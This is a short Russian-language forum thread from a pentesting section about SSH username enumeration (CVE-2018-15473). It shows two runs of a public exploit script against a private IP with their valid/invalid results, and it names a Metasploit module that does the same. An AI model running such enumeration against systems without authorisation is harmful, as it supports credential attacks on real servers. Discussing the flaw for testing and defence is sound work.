ANTICHAT - Detecting SSH Username Enumeration

ANTICHAT (https://forum.antichat.xyz/index.php)

- Этичный хакинг или пентестинг (https://forum.antichat.xyz/forumdisplay.php?f=209)

- - Detecting SSH Username Enumeration - узнаем username (https://forum.antichat.xyz/showthread.php?t=564788)

Очень мало ознакомился с данной уязвимостью, надеюсь мне помогут и знающие люди допишут полезной инфы в комментах.
Скрипт на питоне по адресу Exploit позволяет перечислять имена пользователей.
Пример с правельным username
└──╼ $python2.7 45210.py --port 22 192.168.1.2 root
[+] Valid username
Не правильный
└──╼ $python2.7 45210.py --port 22 192.168.1.2 admin[*] Invalid username
Так и не понял суматохи по поводу этой уязвимости, ведь есть auxiliary(scanner/ssh/ssh_enumusers) которая , также помогает узнать username

А была суматоха?

Цитата:

Letun сказал(а):

А была суматоха?

Согласен сумтохи нет. Проблема с перебором пользователей ssh, как я понял уже давно.
Прост вычитал решил поделиться.
eng enumeration-cve-2018-15473
РУС attackers-guess-username